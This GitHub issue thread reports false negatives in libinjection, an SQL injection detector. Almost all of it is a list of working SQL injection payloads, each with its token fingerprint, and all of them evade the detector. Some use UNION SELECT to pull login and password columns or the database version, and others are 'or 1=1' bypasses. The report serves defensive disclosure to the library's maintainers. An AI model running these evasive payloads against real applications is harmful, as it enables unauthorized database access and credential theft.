client9 / libinjection

SQL / SQLI tokenizer parser analyzer

Couple false negatives #130

Open migolovanov opened 7 years ago

migolovanov commented 7 years ago

Hello! These two payloads are not detected by libinjection:

' + 1<@. union select 1,2,login,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from users limit 1 -- 1
' + 1<@ union select 1,2,login,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from users limit 1 -- 1

migolovanov commented 7 years ago

I think I have found a couple more.

Query: select * from users where id={payload}

Fingerprint: &1o.U, Payload: or 1<@. union select 1,version()#
Fingerprint: &1oUE, Payload: or 1.<@ union select 1,version()#
Fingerprint: &vo.U, Payload: or @<@. union select 1,version()#
Fingerprint: &voUE, Payload: or !@<@ union select 1,version()#
Fingerprint: sns, Payload: or 1<@ union select 'a',version()#
Fingerprint: &(1)&, Payload: or (1) or 1=1#
Fingerprint: &(v)&, Payload: or (@) or 1=1#
Fingerprint: &1o&1, Payload: or 1<@ or 1=1#
Fingerprint: &1o.&, Payload: or 1<@. or 1=1#
Fingerprint: &1ov&, Payload: or 1%@ or 1=1#
Fingerprint: &vo&1, Payload: or @<@ or 1=1#
Fingerprint: &vo.&, Payload: or @<@. or 1=1#
Fingerprint: 1o&1c, Payload: + 1<@ or 1=1#
Fingerprint: 1o.&1, Payload: + 1<@. or 1=1#
Fingerprint: s(&1c, Payload: or 1#'( or 1=1#
Fingerprint: s(s, Payload: or '(' or 1=1#
Fingerprint: s)s, Payload: or ')' or 1=1#
Fingerprint: s,&1c, Payload: or 1#', or 1=1#
Fingerprint: s.&1c, Payload: or 1#'. or 1=1#
Fingerprint: s.s, Payload: or '.' or 1=1#
Fingerprint: s1&1c, Payload: or 1#'1 or 1=1#
Fingerprint: s1s, Payload: or '1' or 1=1#
Fingerprint: sc, Payload: or "#" or 1=1#
Fingerprint: sn&1c, Payload: or 1#'a or 1=1#
Fingerprint: sns, Payload: or 'a' or 1=1#
Fingerprint: sv, Payload: or '@' or 1=1#
Fingerprint: sv&1c, Payload: or 1#'@ or 1=1#
Fingerprint: s{&1c, Payload: or 1#'{ or 1=1#
Fingerprint: s{s, Payload: or '{' or 1=1#
Fingerprint: vo&1c, Payload: + @<@ or 1=1#
Fingerprint: vo.&1, Payload: + @<@. or 1=1#

Query: select * from users where id='{payload}'

Fingerprint: s&1o., Payload: ' or 1<@. union select @@version,version()#
Fingerprint: s&1oU, Payload: ' or 1<@ union select @@version,version()#
Fingerprint: s&vo., Payload: ' or @<@. union select @@version,version()#
Fingerprint: s&voU, Payload: ' or @<@ union select @@version,version()#
Fingerprint: so.UE, Payload: ' + 1<@. union select @@version,version()#
Fingerprint: soUE1, Payload: ' + 1<@ union select 1,version()#
Fingerprint: soUEf, Payload: ' + 1<@ union select version(),version()#
Fingerprint: soUEs, Payload: ' + 1<@ union select 'a',version()#
Fingerprint: soUEv, Payload: ' + 1<@ union select @@version,version()#
Fingerprint: so&1c, Payload: ' + 1<@ or 1=1#
Fingerprint: s&1o&, Payload: ' or 1<@ or 1=1#
Fingerprint: s&vo&, Payload: ' or @<@ or 1=1#
Fingerprint: so&1c, Payload: ' + 1<@ or 1=1#
Fingerprint: so.&1, Payload: ' + 1<@. or 1=1#
Fingerprint: sUE11, Payload: ' union select 1.$,version()#
Fingerprint: sUEsn, Payload: ' union select ''a,version()#
Fingerprint: s, Payload: ' union select ""a,version()#

Also, I didn't quite understand why ' union select ""a,version()# was considered as s.

migolovanov commented 7 years ago

I've checked different databases; here is a list of working payloads that were not included in the previous post.